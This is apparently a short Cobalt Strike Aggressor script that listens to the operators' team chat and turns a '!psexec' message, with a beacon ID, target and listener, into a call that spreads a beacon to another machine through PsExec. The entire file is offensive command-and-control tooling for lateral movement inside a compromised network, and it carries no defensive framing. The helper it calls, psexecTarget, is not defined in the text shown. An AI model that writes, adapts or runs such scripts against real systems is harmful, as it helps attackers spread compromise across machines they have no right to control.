on event_public {
    # local variable to store the command
    local('@input $cmd @args')
    
    # If the first character is a !, then it is a command
    if (substr($2, 0, 1) eq "!") {
        @input = split(" ", $2); # Split on spaces
        $cmd = @input[0]; #command is !<cmd> arg1 arg2 arg3 ...
        @args = sublist(@input, 1); # sublist gets everything after !cmd

        ## Debug logging
        # println("Command received: $cmd");
        # println("Arguments: " . @args);

        if ($cmd eq "!psexec") {
            if (size(@args) == 3) {
                $bid      = @args[0];
                $target   = @args[1];
                $listener = @args[2];

                # Log to script console for debug purposes
                # println("Beacon ID: $bid");
                # println("Target: $target");
                # println("Listener: $listener");

                psexecTarget($bid, $target, $listener);
            }
            else if (size(@args) != 3) {
                elog("Please enter all arguments! Necessary arguments are: Beacon Target Listener.");
            }
        }
    }
}